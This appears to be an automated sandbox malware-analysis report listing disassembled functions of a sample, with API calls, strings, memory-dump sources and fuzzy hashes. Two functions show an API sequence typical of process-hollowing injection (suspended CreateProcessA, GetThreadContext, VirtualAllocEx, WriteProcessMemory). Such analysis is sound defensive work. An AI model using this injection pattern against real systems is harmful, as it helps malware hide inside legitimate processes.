Opcode Fuzzy Hash: accb126451aa060780395980f41b3b3b737be543a786ab1eee715968a8ff331a
Instruction Fuzzy Hash: 0D318131A10248AFDB04DF68C985BDEBBB5FF49704F10462AF805A72C1D7799980CB98

Function 0043AB83 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0043ABBD

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 614a3e3ee89691309344d2c14c20bc16bf30284b6f7f3b8c42e64e4b54115df9
Instruction ID: bac137681c9ca597e37ba9531fe35a84120f7c13ae4ad938d522c887f6803b56
Opcode Fuzzy Hash: 614a3e3ee89691309344d2c14c20bc16bf30284b6f7f3b8c42e64e4b54115df9
Instruction Fuzzy Hash: 50112AB5A0420AAFCF05DF59E94199B7BF4EF48304F05406AF809EB351D670DD21CB69

Function 0044195E Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004419C1

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ff89ec45d56ad598fc1cdac097a9ffa15eccbe9b6325dd4b30191e09ed1fe268
Instruction ID: 799b6a85cbccac2f33dfe496b9ce905ab0cbfc30bf4f414a1533328cc09b4bab
Opcode Fuzzy Hash: ff89ec45d56ad598fc1cdac097a9ffa15eccbe9b6325dd4b30191e09ed1fe268
Instruction Fuzzy Hash: 63014FB2C0015DBFDF01AFA88C01AEE7FB5AF08314F14416AF954E21A1E6358A61DB95

Function 004416A5 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00441A95,?,?,00000000,?,00441A95,00000000,0000000C), ref: 004416C2

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: efd75a4b3e0d0f44703b7e6113a489f3725145c46bff7276ab7cb2ca30d4afc5
Instruction ID: 728716dea2d8701cc34847fc6eeab83fc4e7ccc419190b368175d6442f09313a
Opcode Fuzzy Hash: efd75a4b3e0d0f44703b7e6113a489f3725145c46bff7276ab7cb2ca30d4afc5
Instruction Fuzzy Hash: 10D06C3201020DBBDF028F84DC06EDE3BAAFB48715F014150BA1856020C732E861AB94

Function 00408622 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?), ref: 00408629

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1c359e556df86ff6f81b295afed9701b7315f92a1b1b96a2d875eaf16d26da57
Instruction ID: 1c7731155532762ea0cc6bc8802ef62d7505f1c82931dda35db703014732aedc
Opcode Fuzzy Hash: 1c359e556df86ff6f81b295afed9701b7315f92a1b1b96a2d875eaf16d26da57
Instruction Fuzzy Hash: D5C08C34001A000AEE1C0A386B8809A330299433FA7D51FFED4F1AB2F2CB3F9807D608

Function 00408620 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?), ref: 00408629

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 91263034b88fd9d872aba8cf726a75655e3cadde92fadada609a05562aff1eac
Instruction ID: 67d06cb4adf29cc026aec98414a28c27b2a30c9821ab3dc89f21aabf060c324f
Opcode Fuzzy Hash: 91263034b88fd9d872aba8cf726a75655e3cadde92fadada609a05562aff1eac
Instruction Fuzzy Hash: 65C012340016004ADA1C4A2867480153211990236A3E10FBDD4B1661E1CB3BC403C618

Function 007841C5 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00784216

Memory Dump Source

Source File: 00000000.00000002.2286201427.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_783000_3plugin29563.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 1a8c5929ae5f9d1f5b720a95ccd196308845a741e955072a568ab6153dd54a66
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: B4113C79A40208EFDB01DF98C989E98BBF5EF08350F1580A4F9489B362D375EA50DF90

Non-executed Functions

Function 0041C708 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0041C70E
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0041C71C
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0041C72D
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0041C73E
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0041C74F
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0041C760
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0041C771
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0041C782
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0041C793
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0041C7A4
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0041C7B5
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0041C7C6
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0041C7D7
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0041C7E8
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0041C7F9
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0041C80A
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0041C81B
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0041C82C
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 0041C83D
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 0041C84E
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0041C85F
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0041C870
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0041C881
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0041C892
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 0041C8A3
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0041C8B4
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0041C8C5
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 0041C8D6
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0041C8E7
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0041C8F8
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 0041C909
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0041C91A
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 0041C92B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0041C93C
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 0041C94D
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 0041C95E
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 0041C96F
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 0041C980
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 0041C991
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0041C9A2
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 0041C9B3

Strings

FlsFree, xrefs: 0041C722
InitializeCriticalSectionEx, xrefs: 0041C755
CreateThreadpoolWork, xrefs: 0041C953
CreateSemaphoreExW, xrefs: 0041C799
SleepConditionVariableCS, xrefs: 0041C8ED
LCMapStringEx, xrefs: 0041C9A8
FlsSetValue, xrefs: 0041C744
GetCurrentProcessorNumber, xrefs: 0041C843
CreateThreadpoolWait, xrefs: 0041C7EE
SleepConditionVariableSRW, xrefs: 0041C942
GetTickCount64, xrefs: 0041C876
kernel32.dll, xrefs: 0041C709
CloseThreadpoolWork, xrefs: 0041C975
FreeLibraryWhenCallbackReturns, xrefs: 0041C832
GetCurrentPackageId, xrefs: 0041C865
InitializeSRWLock, xrefs: 0041C8FE
TryAcquireSRWLockExclusive, xrefs: 0041C920
CreateThreadpoolTimer, xrefs: 0041C7AA
CreateSemaphoreW, xrefs: 0041C788
GetFileInformationByHandleEx, xrefs: 0041C887
InitOnceExecuteOnce, xrefs: 0041C766
FlsGetValue, xrefs: 0041C733
CreateSymbolicLinkW, xrefs: 0041C859
InitializeConditionVariable, xrefs: 0041C8BA
WaitForThreadpoolTimerCallbacks, xrefs: 0041C7CC
FlsAlloc, xrefs: 0041C716
SetThreadpoolTimer, xrefs: 0041C7BB
CreateEventExW, xrefs: 0041C777
SubmitThreadpoolWork, xrefs: 0041C964
GetLocaleInfoEx, xrefs: 0041C997
SetFileInformationByHandle, xrefs: 0041C898
CloseThreadpoolWait, xrefs: 0041C810
WakeAllConditionVariable, xrefs: 0041C8DC
CloseThreadpoolTimer, xrefs: 0041C7DD
WakeConditionVariable, xrefs: 0041C8CB
SetThreadpoolWait, xrefs: 0041C7FF
ReleaseSRWLockExclusive, xrefs: 0041C931
GetSystemTimePreciseAsFileTime, xrefs: 0041C8A9
AcquireSRWLockExclusive, xrefs: 0041C90F
FlushProcessWriteBuffers, xrefs: 0041C821
CompareStringEx, xrefs: 0041C986

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 33ab0460f6536ff686f2647f824dff4c0f5cd89bd5de9affe1c197909d8f0196
Instruction ID: 0f84095e92aac1c2e0bb15fd21b29d90348e2d41669b35d16af1684e6b0aebcd
Opcode Fuzzy Hash: 33ab0460f6536ff686f2647f824dff4c0f5cd89bd5de9affe1c197909d8f0196
Instruction Fuzzy Hash: 38612875952711EBD7016FB4FC0DF893AB8AA09B53B608537F906D21B2E6F88004CB6D

Function 00406FB0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 121memoryprocessthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406FDD
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040703B
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00407054
GetThreadContext.KERNEL32(?,00000000), ref: 00407069
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00407089
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 004070CB
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 004070E8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 004071A1

Strings

, xrefs: 00407080
invalid stoi argument, xrefs: 00406FA0
VUUU, xrefs: 00406E51

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
String ID: $VUUU$invalid stoi argument
API String ID: 3796053839-3954507777
Opcode ID: 22c2605f09107def937ae551f4ccf5436792bac80988d22b45d6996278ec0893
Instruction ID: efcec7c5240c085adfdd2bc5d5315caad389b4ecc30a224d68c793a67d464a6d
Opcode Fuzzy Hash: 22c2605f09107def937ae551f4ccf5436792bac80988d22b45d6996278ec0893
Instruction Fuzzy Hash: B7416E75644301BFE7209F50DC06F5A77E8BF88B15F000429F688EA2D1D7B4E954CB9A

Function 02117217 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 121memoryprocessthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02117244
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 021172A2
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 021172BB
GetThreadContext.KERNEL32(?,00000000), ref: 021172D0
ReadProcessMemory.KERNEL32(?,00458E08,?,00000004,00000000), ref: 021172F0
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 02117332
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 0211734F
VirtualFree.KERNEL32(?,00000000,00008000), ref: 02117408

Strings

VUUU, xrefs: 021170B8

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
String ID: VUUU
API String ID: 3796053839-2040033107
Opcode ID: 22c2605f09107def937ae551f4ccf5436792bac80988d22b45d6996278ec0893
Instruction ID: be5668e2aca2bfe3276b88678bf54fd2d500dfe9fe262b930ae5b59c5ed45ed4
Opcode Fuzzy Hash: 22c2605f09107def937ae551f4ccf5436792bac80988d22b45d6996278ec0893
Instruction Fuzzy Hash: B3416E75644301BFE7219F10DC06F9ABBE8BF48B15F504429F684E62E0D7B0E515CB5A

Function 00420DB3 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00420EB6
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00420F02

Part of subcall function 004225FD: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 004226F0

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00420F6E
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00420F8A
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00420FDE
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0042100B
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00421061

Strings

(, xrefs: 00420EC2

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: 57df7905c3e52f911e9b9feca89e84a27f2a066077550a2e3f20bb575c069669
Instruction ID: 11710a1f1a3a456960b337aafa56a7c17b145b8880d8825eb7a563cb9f3e6f1f
Opcode Fuzzy Hash: 57df7905c3e52f911e9b9feca89e84a27f2a066077550a2e3f20bb575c069669
Instruction Fuzzy Hash: 20B17C70A00625EFCB18CF58EA90A7AB7F4FF44300F55816EE805AB751D774AD81CB99

Function 0213101A Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0213111D
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 02131169

Part of subcall function 02132864: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 02132957

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 021311D5
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 021311F1
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 02131245
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 02131272
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 021312C8

Strings

(, xrefs: 02131129

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: 553095efb5d9da27820889a6ffc0bd96821c51f409c3651e11de9656da88818b
Instruction ID: 4df8f46ce57e787d2904373773e54a400446ef38b12a126baf4d09edce3b19fd
Opcode Fuzzy Hash: 553095efb5d9da27820889a6ffc0bd96821c51f409c3651e11de9656da88818b
Instruction Fuzzy Hash: 73B16B70A40615AFDB29CFA8C990B7AB7F6FF44704F248269D809AB750D770A941CF94

Function 004215A2 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00422C9C: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422CAF

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 004215B4

Part of subcall function 00422DAF: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00422DD9
Part of subcall function 00422DAF: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00422E48

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 004216E6
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00421746
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00421752
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 0042178D
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 004217AE
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 004217BA
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 004217C3
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 004217DB

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: 21fd4cb69d2bcde8ee610a757bce9874a76c7aa4b66dc321bd5b6076bf03b20a
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: 14816A71B00225AFCB18CF69D580A6EB7F1FF98304B5546AEE405AB711C774AD42CB88

Function 02131809 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02132F03: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 02132F16

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 0213181B

Part of subcall function 02133016: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 02133040
Part of subcall function 02133016: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 021330AF

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 0213194D
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 021319AD
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 021319B9
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 021319F4
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 02131A15
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 02131A21
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 02131A2A
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 02131A42

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: fca450c05e40c12673e2511218dd3a1075d88eca30bdfacd0c91f237d5058a9d
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: 18814B71E40225AFCB1ACFA8C580A6DB7F7FF48304B1586ADD449AB701C770E952CB94

Function 00442447 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004424C9
_free.LIBCMT ref: 004424ED
_free.LIBCMT ref: 0044267A
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 0044268C
_free.LIBCMT ref: 00442846

Strings

E(D, xrefs: 00442635, 00442750, 0044263B

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: E(D
API String ID: 597776487-2784804122
Opcode ID: fffee3f05e7675415316f6988974924bbe2298186793caa7a6e842c7c0db9d1e
Instruction ID: 8a2ad7c8ddb88666a8a80ac310e7c52cb4a3d9176fa67102464be6fe7cd5fa65
Opcode Fuzzy Hash: fffee3f05e7675415316f6988974924bbe2298186793caa7a6e842c7c0db9d1e
Instruction Fuzzy Hash: CFC15A71900205ABEB14AF298E51AAABBB9EF45314F9401AFF44097382E7BC9E41C75D

Function 004430D8 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00443253

Strings

1#SNAN, xrefs: 004443EA
1#IND, xrefs: 004443E3
1#QNAN, xrefs: 004443F1
1#INF, xrefs: 0044440E

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: d6d1f0440d08be827f1705c500f6d28cca80c9c5e27a8cac278790fbe60329eb
Instruction ID: c72f463c4339176035046debbf3aeda33ae5999379275fbf69cb5ce2fa4f519b
Opcode Fuzzy Hash: d6d1f0440d08be827f1705c500f6d28cca80c9c5e27a8cac278790fbe60329eb
Instruction Fuzzy Hash: B0C24B71E046288FEB25CE28DD407EAB3B5EB88705F1441EBD94DE7241E778AE818F45

Function 0042EBE8 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042EC21

Part of subcall function 00428ECF: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00428EF0

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0042EC87
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0042EC9F
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0042ECAC

Part of subcall function 0042E74F: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E777
Part of subcall function 0042E74F: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E80F
Part of subcall function 0042E74F: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E819
Part of subcall function 0042E74F: Concurrency::location::_Assign.LIBCMT ref: 0042E84D
Part of subcall function 0042E74F: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E855

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: 408ce37d6a7c8c1258ba538c9c045a9760660f01c5c2507fc7694a852da23b7d
Instruction ID: 830cda061d4d8cac2763e1cfd71df3183360679f87381ea1de5b8a4a5baf2a9a
Opcode Fuzzy Hash: 408ce37d6a7c8c1258ba538c9c045a9760660f01c5c2507fc7694a852da23b7d
Instruction Fuzzy Hash: 8C51E535B00225EBCF14DF56D885FAEB775AF44314F1940AAE8027B392CB78AE01CB95

Function 0213EE4F Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0213EE88

